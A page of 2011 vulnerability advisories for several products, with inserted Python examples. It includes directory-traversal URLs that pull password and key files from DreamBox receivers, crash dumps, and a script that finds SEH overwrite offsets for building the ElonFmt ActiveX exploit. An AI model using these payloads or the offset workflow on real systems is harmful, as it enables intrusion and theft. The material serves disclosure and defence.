Posts Tagged ‘remote’

Tugux CMS 1.2 Multiple Remote Vulnerabilities

The application suffers from multiple issues, including reflected and stored XSS, SQL injection, local file inclusion and URL redirection. Vulnerable parameters include ‘name’, ‘comment’, ‘nid’, ‘submit1’, ‘email’ and ‘topic_id’.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5014.php

DreamBox DM500(+) Arbitrary File Download Vulnerability

DreamBox suffers from an arbitrary file download vulnerability via directory traversal: prefixing the request path with an encoded ‘/’ (%2f) and a run of ‘../’ sequences, and terminating it with a null byte (%00), makes the box’s HTTP server serve any file from the filesystem, as in the GET requests below. An attacker can obtain sensitive information such as paid channel keys, usernames, passwords, configuration and plug-in data.

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00
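Added example (not part of the advisory or of the DreamBox firmware): how a hardened HTTP server should decode and normalise a request path so that the %2f + ‘../’ + %00 construction above cannot reach files outside the document root, together with the check that flags such requests. The PoC paths are the ones from the advisory with the host stripped; WEB_ROOT and the benign request are assumptions made for this example.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www"  # assumption: the box's document root; not taken from the advisory

# PoC request paths from the DreamBox advisory above (host part stripped)
POC_PATHS = [
    "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00",
    "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00",
    "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00",
    "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00",
]


def decode_path(raw):
    """Percent-decode until the string stops changing (so %252f-style double
    encoding is undone too) and cut at the first NUL, which is where a C-string
    based server would silently truncate the filename anyway.
    Returns (decoded_path, had_nul)."""
    decoded = raw
    for _ in range(4):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    nul = decoded.find("\x00")
    if nul >= 0:
        return decoded[:nul], True
    return decoded, False


def is_traversal(raw):
    """True when the decoded path carries a '..' segment or an embedded NUL,
    i.e. the two tricks the PoC URLs combine. Checking the *decoded* segments
    is what makes the %2f encoding irrelevant."""
    path, had_nul = decode_path(raw)
    return had_nul or ".." in path.split("/")


def safe_resolve(raw):
    """Map a request path onto the filesystem so it can never leave WEB_ROOT:
    normalise the decoded path as an absolute path first (leading '../' then
    collapses against '/', not against the document root) and only afterwards
    re-root it under WEB_ROOT."""
    path, _ = decode_path(raw)
    inside = posixpath.normpath("/" + path.lstrip("/"))   # '/../../etc/passwd' -> '/etc/passwd'
    return posixpath.join(WEB_ROOT, inside.lstrip("/"))


if __name__ == "__main__":
    for p in POC_PATHS + ["/index.html"]:   # '/index.html' is a constructed benign request
        print(f"traversal={is_traversal(p)!s:5} serves={safe_resolve(p)}  <- {p}")
```

Run as a script it prints one line per request; every PoC path is flagged and, even if it were served, would resolve to a file under WEB_ROOT rather than /etc/passwd or the camd3 key store.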

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5013.php

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

The ElonFmt ActiveX Control Module suffers from a buffer overflow vulnerability. When a large buffer is passed as the pid item of the GetItem1 function in the elonfmt.ocx module, several registers are overwritten, including the SEH handler. The input goes through a character translation before it reaches the stack, so the bytes in the register and stack dumps below are the translated form of what was sent, which has to be taken into account when building the buffer. An attacker can exploit this to execute arbitrary code on the affected node.

—————————————————————–
CompanyName
FileDescription ElonFmt ActiveX Control Module
FileVersion 1, 1, 14, 1
InternalName ElonFmt
LegalCopyright Copyright (C) 2002 – 2008 Gesytec GmbH
OriginalFileName ElonFmt.OCX
ProductName ElonFmt ActiveX Control Module
ProductVersion 1, 1, 14, 1
—————————————————————–

Exception Code: ACCESS_VIOLATION
Disasm: AAAAAAAA ????? ()

Seh Chain:
————————————————–
1 7C9032BC ntdll.dll
2 AAAAAAAA

Registers:
————————————————–
EIP AAAAAAAA
EAX 00000000
EBX 00000000
ECX AAAAAAAA
EDX 7C9032BC -> 04244C8B
EDI 00000000
ESI 00000000
EBP 0013E7F8 -> 0013E8A8
ESP 0013E7D8 -> 7C9032A8

Block Disassembly:
————————————————–
AAAAAAAA ????? <--- CRASH

ArgDump:
--------------------------------------------------
EBP+8 0013E8C0 -> C0000005
EBP+12 0013ECF0 -> AAAAAAAA
EBP+16 0013E8DC -> 0001003F
EBP+20 0013E894 -> 7C96F3BC
EBP+24 AAAAAAAA
EBP+28 00000236

Stack Dump:
————————————————–
13EBA8 01 00 00 00 00 00 00 00 08 AF 47 00 81 18 C3 77 [……….G….w]
13EBB8 14 2C 00 00 A2 56 00 10 41 ED 13 00 E8 EB 13 00 […..V……….]
13EBC8 20 8F 63 01 B8 8E 63 01 81 18 C3 77 01 00 00 00 [..c…c….w….]
13EBD8 64 21 12 77 FF 00 00 00 74 E1 97 7C 51 7C 91 7C [d..w….t…Q…]
13EBE8 AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA […………….]

———————————————–

(fc.1608): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
cccccccc ?? ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc mov ebx,0CCBBBBBBh
0013ecf5 cc int 3
0013ecf6 cc int 3
0013ecf7 cc int 3
0013ecf8 dddd fstp st(5)
0013ecfa dddd fstp st(5)
0013ecfc dddd fstp st(5)
0013ecfe dddd fstp st(5)

0:000> d esp
0013eb58 01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00 …..aS.|Zc…..
0013eb68 88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf ……..$FS…..
0013eb78 a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89 .Zc..Zc…..`)S.
0013eb88 ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00 ….h………..
0013eb98 06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e ……….st..C~
0013eba8 01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77 ……..@.G….w
0013ebb8 1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00 …..V……….
0013ebc8 20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00 .c…c….w….
0:000> d
0013ebd8 64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c d!.w….t..|Q|.|
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec58 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ec68 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec78 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec88 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec98 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013eca8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecb8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecc8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecd8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ece8 aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc …………….
0013ecf8 dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01 …………..c.
0013ed08 00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00 ……c………
0013ed18 82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00 ……….c.(…
0013ed28 00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73 ……c……C.s
0013ed38 5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10 \……………
0013ed48 80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01 ..c.$.V…..x.c.
0013ed58 48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00 H……………
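To turn a crash like the one above into exact nSEH/SEH offsets, the usual approach is a cyclic pattern instead of a run of ‘A’s. Because the input only reaches the stack after a character translation, the pattern has to be sent in a form that survives it. The following is an added example, not code from the advisory: it assumes the translation is hex decoding (the 0xAA/0xBB/0xCC/0xDD byte runs in the dumps above are consistent with ‘AA’, ‘BB’, … input being decoded into single bytes, but the advisory only says “character translation”), and the crash values used at the bottom are constructed for the demonstration, not taken from the page.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). Every 4-byte window is
    unique within the first 20280 bytes, so a dword that lands in a register or
    in the SEH record identifies the exact input offset it came from."""
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(pattern, dword):
    """Offset of a 32-bit value copied from the crash dump (nSEH, SEH, EIP...)
    inside the pattern, or -1 when the value did not come from the pattern
    (0xBBBBBBBB / 0xCCCCCCCC in the dumps above came from plain character
    runs, so they map to nothing)."""
    return pattern.find(struct.pack("<I", dword))


def hex_encode_for_pid(raw):
    """Assumed translation (hex decoding, see lead-in): to get byte 0xAA onto
    the stack send 'AA', so every target byte costs two input characters."""
    return raw.hex().upper().encode()


def sent_offset(memory_offset):
    """Under the assumed translation the offset in the sent string is twice
    the offset observed in memory."""
    return 2 * memory_offset


def locate_seh(pattern, nseh_value, seh_value):
    """Map the two dwords read from !exchain back to offsets, both as seen in
    memory (index into the decoded pattern) and as they must be placed in the
    string handed to the pid item."""
    n = pattern_offset(pattern, nseh_value)
    s = pattern_offset(pattern, seh_value)
    return {"nseh": n, "seh": s, "nseh_sent": sent_offset(n), "seh_sent": sent_offset(s)}


if __name__ == "__main__":
    pat = pattern_create(600)
    payload = hex_encode_for_pid(pat)            # what would be passed as the pid item
    # constructed crash: pretend !exchain showed the SEH record at decoded offset 264
    nseh, seh = struct.unpack("<II", pat[264:272])
    print(f"sent {len(payload)} chars; nSEH=0x{nseh:08x} SEH=0x{seh:08x}")
    print(locate_seh(pat, nseh, seh))   # {'nseh': 264, 'seh': 268, 'nseh_sent': 528, 'seh_sent': 536}
```

With a real crash you would paste the two values from `!exchain` into `locate_seh`; the `*_sent` offsets are where the POP/POP/RET address and the short jump go in the string actually passed to the control, and if the translation turns out not to be hex decoding, `hex_encode_for_pid` and `sent_offset` are the two functions to swap out.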

Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php

Anfibia Reactor 2.1.1 (login.do) Remote XSS POST Injection Vulnerability

Vendor: Anfibia Software
Product web page: http://www.anfibia-soft.com
Affected version: 2.1.1.12

Summary: Fast web-based server monitoring. Keep an eye on servers,
connections, databases, cpu, hard drives and more!

Desc: The Anfibia Reactor JS service suffers from an XSS vulnerability
when handling user input to the ‘email’ parameter, sent via POST to the
‘reactor/login.do’ script of the manager login interface. Attackers
can exploit this weakness to execute arbitrary HTML and script code
in a user’s browser session.

Tested on: Microsoft Windows XP Professional SP3 (EN)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com
Zero Science Lab – http://www.zeroscience.mk

[14.03.2011] Vulnerability discovered.
[16.03.2011] Contact with the vendor.
[16.03.2011] Vendor replies asking more details.
[16.03.2011] Sent vulnerability details to vendor.
[16.03.2011] Vendor confirms XSS issue.
[06.04.2011] Vendor releases version 3 to address this issue.
[06.04.2011] Coordinated public advisory released.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5008.php

DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities

DoceboLMS suffers from multiple stored XSS vulnerabilities, both pre- and post-authentication. Input passed through the POST parameters ‘name’, ‘code’ and ‘title’ to index.php is not sanitized, allowing an attacker to execute arbitrary HTML and script code in a user’s browser session on the affected site. URI-based (reflected) XSS vulnerabilities are also present.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5006.php

Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection

FCMS suffers from a stored XSS vulnerability (post-auth) in the messageboard.php script through the ‘subject’ POST parameter. The XML injection lies in the ‘/inc/getChat.php’ script, reachable through the ‘users’ GET parameter when passed with no arguments, and through the ‘message’ POST parameter.

Advisory ID: ZSL-2011-5004
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php

Nitro PDF Reader 1.4.0 Remote Heap Memory Corruption / DoS PoC

Nitro PDF Reader suffers from a heap memory corruption vulnerability which can be exploited by malicious people to cause a denial of service and potentially compromise a vulnerable system. The vulnerability is triggered when processing a malicious PDF file. In the crash below the reader dereferences a pointer that still holds the debug heap’s uninitialised-memory fill value (ecx = 0xBAADF00D), reads a second pointer through it and uses that as a call target, which is why !exploitable classifies the crash as PROBABLY_EXPLOITABLE rather than as a plain crash.

(bc8.b54): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0023f72c ebx=097e9c48 ecx=baadf00d edx=015ee620 esi=097e9c48 edi=097e1da0
eip=01604b77 esp=0023f708 ebp=00000000 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010282
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Nitro PDF\Reader\npdf.dll –
npdf!ProvideCoreHFT+0x170517:
01604b77 8b01 mov eax,dword ptr [ecx] ds:0023:baadf00d=????????
0:000> !load msec
0:000> !exploitable
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable – Data from Faulting Address controls Code Flow starting at npdf!ProvideCoreHFT+0x0000000000170517 (Hash=0x09746032.0x27746032)

The data from the faulting address is later used as the target for a branch.
0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0xffffffffbaadf00d
Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:014d4b77 mov eax,dword ptr [ecx]

Basic Block:
014d4b77 mov eax,dword ptr [ecx]
Tainted Input Operands: ecx
014d4b79 mov edx,dword ptr [eax]
Tainted Input Operands: eax
014d4b7b push 1
014d4b7d call edx
Tainted Input Operands: ecx, edx

Exception Hash (Major/Minor): 0x09746032.0x27746032

Stack Trace:
npdf!ProvideCoreHFT+0x170517
Instruction Address: 0x00000000014d4b77

Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable – Data from Faulting Address controls Code Flow starting at npdf!ProvideCoreHFT+0x0000000000170517 (Hash=0x09746032.0x27746032)

The data from the faulting address is later used as the target for a branch.
0:000> !exploitable -m
IDENTITY:HostMachine\HostUser
PROCESSOR:X86
CLASS:USER
QUALIFIER:USER_PROCESS
EVENT:DEBUG_EVENT_EXCEPTION
EXCEPTION_FAULTING_ADDRESS:0xffffffffbaadf00d
EXCEPTION_CODE:0xC0000005
EXCEPTION_LEVEL:SECOND_CHANCE
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION
EXCEPTION_SUBTYPE:READ
FAULTING_INSTRUCTION:014d4b77 mov eax,dword ptr [ecx]
BASIC_BLOCK_INSTRUCTION_COUNT:4
BASIC_BLOCK_INSTRUCTION:014d4b77 mov eax,dword ptr [ecx]
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:ecx
BASIC_BLOCK_INSTRUCTION:014d4b79 mov edx,dword ptr [eax]
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:eax
BASIC_BLOCK_INSTRUCTION:014d4b7b push 1
BASIC_BLOCK_INSTRUCTION:014d4b7d call edx
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:ecx
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:edx
MAJOR_HASH:0x09746032
MINOR_HASH:0x27746032
STACK_DEPTH:1
STACK_FRAME:npdf!ProvideCoreHFT+0x170517
INSTRUCTION_ADDRESS:0x00000000014d4b77
INVOKING_STACK_FRAME:0
DESCRIPTION:Data from Faulting Address controls Code Flow
SHORT_DESCRIPTION:TaintedDataControlsCodeFlow
CLASSIFICATION:PROBABLY_EXPLOITABLE
BUG_TITLE:Probably Exploitable – Data from Faulting Address controls Code Flow starting at npdf!ProvideCoreHFT+0x0000000000170517 (Hash=0x09746032.0x27746032)
EXPLANATION:The data from the faulting address is later used as the target for a branch.
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************

ww_0ccc058c\MFC80ENU.DLL
*************************************************************************
*** ***
*** ***
*** Your debugger is not using the correct symbols ***
*** ***
*** In order for this command to work properly, your symbol path ***
*** must point to .pdb files that have full type information. ***
*** ***
*** Certain .pdb files (such as the public OS symbols) do not ***
*** contain the required information. Contact the group that ***
*** provided you with these symbols if you need this command to ***
*** work. ***
*** ***
*** Type referenced: kernel32!pNlsUserInfo ***
*** ***
*************************************************************************

FAULTING_IP:
npdf!ProvideCoreHFT+170517
014d4b77 8b01 mov eax,dword ptr [ecx]

EXCEPTION_RECORD: ffffffff — (.exr 0xffffffffffffffff)
ExceptionAddress: 014d4b77 (npdf!ProvideCoreHFT+0x00170517)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: baadf00d
Attempt to read from address baadf00d

FAULTING_THREAD: 00000490

DEFAULT_BUCKET_ID: INVALID_POINTER_READ

PROCESS_NAME: NitroPDFReader.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 – The instruction at “0x%08lx” referenced memory at “0x%08lx”. The memory could not be “%s”.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 – The instruction at “0x%08lx” referenced memory at “0x%08lx”. The memory could not be “%s”.

EXCEPTION_PARAMETER1: 00000000

EXCEPTION_PARAMETER2: baadf00d

READ_ADDRESS: baadf00d

FOLLOWUP_IP:
npdf!ProvideCoreHFT+170517
014d4b77 8b01 mov eax,dword ptr [ecx]

NTGLOBALFLAG: 70

APPLICATION_VERIFIER_FLAGS: 0

PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ

BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ

LAST_CONTROL_TRANSFER: from 00000000 to 014d4b77

STACK_TEXT:
00000000 00000000 00000000 00000000 00000000 npdf!ProvideCoreHFT+0x170517

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: npdf!ProvideCoreHFT+170517

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: npdf

IMAGE_NAME: npdf.dll

DEBUG_FLR_IMAGE_TIMESTAMP: 4d2b1b47

STACK_COMMAND: ~0s ; kb

FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_npdf.dll!ProvideCoreHFT

BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_npdf!ProvideCoreHFT+170517

WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/NitroPDFReader_exe/1_4_0_11/4d2b1bc8/npdf_dll/1_4_0_11/4d2b1b47/c0000005/00174b77.htm?Retriage=1

Followup: MachineOwner
———

npdf!ProvideCoreHFT+0x170517:
01714b77 8b01 mov eax,dword ptr [ecx]
01714b79 8b10 mov edx,dword ptr [eax]
01714b7b 6a01 push 1
01714b7d ffd2 call edx
01714b7f 8b432c mov eax,dword ptr [ebx+2Ch]
01714b82 3bc5 cmp eax,ebp
01714b84 7409 je npdf!ProvideCoreHFT+0x17052f (01714b8f)

npdf!ProvideCoreHFT+0x170526:
01714b86 50 push eax
01714b87 e86ca10100 call npdf!ProvideCoreHFT+0x18a698 (0172ecf8)
01714b8c 83c404 add esp,4

npdf!ProvideCoreHFT+0x17052f:
01714b8f 8b7324 mov esi,dword ptr [ebx+24h]
01714b92 397320 cmp dword ptr [ebx+20h],esi
01714b95 8d7b1c lea edi,[ebx+1Ch]
01714b98 7605 jbe npdf!ProvideCoreHFT+0x17053f (01714b9f)

npdf!ProvideCoreHFT+0x17053a:
01714b9a e82c600200 call npdf!ProvideCoreHFT+0x19656b (0173abcb)

npdf!ProvideCoreHFT+0x17053f:
01714b9f 8b4704 mov eax,dword ptr [edi+4]
01714ba2 3b4708 cmp eax,dword ptr [edi+8]
01714ba5 89442414 mov dword ptr [esp+14h],eax
01714ba9 7609 jbe npdf!ProvideCoreHFT+0x170554 (01714bb4)

npdf!ProvideCoreHFT+0x17054b:
01714bab e81b600200 call npdf!ProvideCoreHFT+0x19656b (0173abcb)
01714bb0 8b442414 mov eax,dword ptr [esp+14h]

npdf!ProvideCoreHFT+0x170554:
01714bb4 56 push esi
01714bb5 57 push edi
01714bb6 50 push eax
01714bb7 57 push edi
01714bb8 8d442424 lea eax,[esp+24h]
01714bbc 50 push eax
01714bbd 8bcf mov ecx,edi
01714bbf e82c7afeff call npdf!ProvideCoreHFT+0x157f90 (016fc5f0)
01714bc4 8b4b14 mov ecx,dword ptr [ebx+14h]
01714bc7 8b5104 mov edx,dword ptr [ecx+4]
01714bca 8d7310 lea esi,[ebx+10h]
01714bcd 52 push edx
01714bce 8bce mov ecx,esi
01714bd0 e80b1eedff call npdf!ProvideCoreHFT+0x42380 (015e69e0)
01714bd5 8b4604 mov eax,dword ptr [esi+4]
01714bd8 894004 mov dword ptr [eax+4],eax
01714bdb 8b4604 mov eax,dword ptr [esi+4]
01714bde 896e08 mov dword ptr [esi+8],ebp
01714be1 8900 mov dword ptr [eax],eax
01714be3 8b4604 mov eax,dword ptr [esi+4]
01714be6 894008 mov dword ptr [eax+8],eax
01714be9 8b4340 mov eax,dword ptr [ebx+40h]
01714bec 3bc5 cmp eax,ebp
01714bee 7409 je npdf!ProvideCoreHFT+0x170599 (01714bf9)

npdf!ProvideCoreHFT+0x170590:
01714bf0 50 push eax
01714bf1 e802a10100 call npdf!ProvideCoreHFT+0x18a698 (0172ecf8)
01714bf6 83c404 add esp,4

npdf!ProvideCoreHFT+0x170599:
01714bf9 896b40 mov dword ptr [ebx+40h],ebp
01714bfc 896b44 mov dword ptr [ebx+44h],ebp
01714bff 896b48 mov dword ptr [ebx+48h],ebp
01714c02 8b4704 mov eax,dword ptr [edi+4]
01714c05 3bc5 cmp eax,ebp
01714c07 7409 je npdf!ProvideCoreHFT+0x1705b2 (01714c12)

npdf!ProvideCoreHFT+0x1705a9:
01714c09 50 push eax
01714c0a e8e9a00100 call npdf!ProvideCoreHFT+0x18a698 (0172ecf8)
01714c0f 83c404 add esp,4

npdf!ProvideCoreHFT+0x1705b2:
01714c12 896f04 mov dword ptr [edi+4],ebp
01714c15 896f08 mov dword ptr [edi+8],ebp
01714c18 896f0c mov dword ptr [edi+0Ch],ebp
01714c1b 8b4604 mov eax,dword ptr [esi+4]
01714c1e 8b08 mov ecx,dword ptr [eax]
01714c20 50 push eax
01714c21 56 push esi
01714c22 51 push ecx
01714c23 56 push esi
01714c24 8d44242c lea eax,[esp+2Ch]
01714c28 50 push eax
01714c29 8bce mov ecx,esi
01714c2b c7442440ffffffff mov dword ptr [esp+40h],0FFFFFFFFh
01714c33 e8e828edff call npdf!ProvideCoreHFT+0x42ec0 (015e7520)
01714c38 8b4e04 mov ecx,dword ptr [esi+4]
01714c3b 51 push ecx
01714c3c e8b7a00100 call npdf!ProvideCoreHFT+0x18a698 (0172ecf8)
01714c41 83c404 add esp,4
01714c44 896e04 mov dword ptr [esi+4],ebp
01714c47 896e08 mov dword ptr [esi+8],ebp
01714c4a 8b4c2424 mov ecx,dword ptr [esp+24h]
01714c4e 64890d00000000 mov dword ptr fs:[0],ecx
01714c55 59 pop ecx
01714c56 5f pop edi
01714c57 5e pop esi
01714c58 5d pop ebp
01714c59 5b pop ebx
01714c5a 83c41c add esp,1Ch
01714c5d c3 ret

0xBAADF00D (“bad food”) is the fill pattern the Windows debug heap writes into freshly allocated, uninitialised memory (for example LocalAlloc(LMEM_FIXED) allocations) when the process runs with the heap debugging flags; NTGLOBALFLAG: 70 in the !analyze output above (heap tail checking, free checking and parameter validation, which the loader enables when a process is started under a debugger) confirms that was the case here. ecx holding exactly that value therefore means the code read an object pointer out of heap memory that had been allocated but never initialised. Outside the debugger that slot contains whatever the previous user of the memory left behind, so the call through it depends on attacker-influenced heap contents rather than producing a reliable crash.
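The `!exploitable -m` form above is meant for machine consumption: in a fuzzing campaign the crash handler parses it, buckets crashes by hash, and pulls out the instruction that actually earned the TaintedDataControlsCodeFlow verdict. The following parser is an added example, not part of the advisory or of MSEC’s tooling; the sample input is an excerpt of the `-m` output shown above.

```python
import re

# Excerpt of the `!exploitable -m` output from the Nitro PDF crash above,
# embedded as the sample input (IDENTITY/CLASS/QUALIFIER lines omitted).
SAMPLE = """\
PROCESSOR:X86
EVENT:DEBUG_EVENT_EXCEPTION
EXCEPTION_FAULTING_ADDRESS:0xffffffffbaadf00d
EXCEPTION_CODE:0xC0000005
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION
EXCEPTION_SUBTYPE:READ
FAULTING_INSTRUCTION:014d4b77 mov eax,dword ptr [ecx]
BASIC_BLOCK_INSTRUCTION_COUNT:4
BASIC_BLOCK_INSTRUCTION:014d4b77 mov eax,dword ptr [ecx]
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:ecx
BASIC_BLOCK_INSTRUCTION:014d4b79 mov edx,dword ptr [eax]
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:eax
BASIC_BLOCK_INSTRUCTION:014d4b7b push 1
BASIC_BLOCK_INSTRUCTION:014d4b7d call edx
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:ecx
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:edx
MAJOR_HASH:0x09746032
MINOR_HASH:0x27746032
STACK_FRAME:npdf!ProvideCoreHFT+0x170517
SHORT_DESCRIPTION:TaintedDataControlsCodeFlow
CLASSIFICATION:PROBABLY_EXPLOITABLE
"""

# "<addr> <mnemonic> [<operands>]" as WinDbg prints one instruction
INSTR = re.compile(r"^(?P<addr>[0-9a-fA-F]+)\s+(?P<mnemonic>\S+)(?:\s+(?P<operands>.*))?$")


def parse_exploitable(text):
    """Turn the KEY:VALUE lines into a dict. Scalar keys map to strings; the
    BASIC_BLOCK_INSTRUCTION lines become a list of dicts, each collecting the
    TAINTED_INPUT_OPERAND lines that follow it."""
    record = {"instructions": []}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        value = value.strip()
        if key == "BASIC_BLOCK_INSTRUCTION":
            m = INSTR.match(value)
            if m is None:
                continue
            record["instructions"].append({
                "addr": int(m.group("addr"), 16),
                "mnemonic": m.group("mnemonic"),
                "operands": m.group("operands") or "",
                "tainted": [],
            })
        elif key == "BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND":
            if record["instructions"]:
                record["instructions"][-1]["tainted"].append(value)
        else:
            record[key] = value
    return record


def tainted_control_transfer(record):
    """First call/jmp whose target register is marked tainted, or None. This is
    the concrete reason a crash gets TaintedDataControlsCodeFlow: above, the
    chain is mov eax,[ecx] -> mov edx,[eax] -> call edx, with ecx (the
    uninitialised object pointer) as the original taint source."""
    for ins in record["instructions"]:
        if ins["mnemonic"] in ("call", "jmp"):
            target = ins["operands"].split(",")[0].strip()
            if target in ins["tainted"]:
                return ins
    return None


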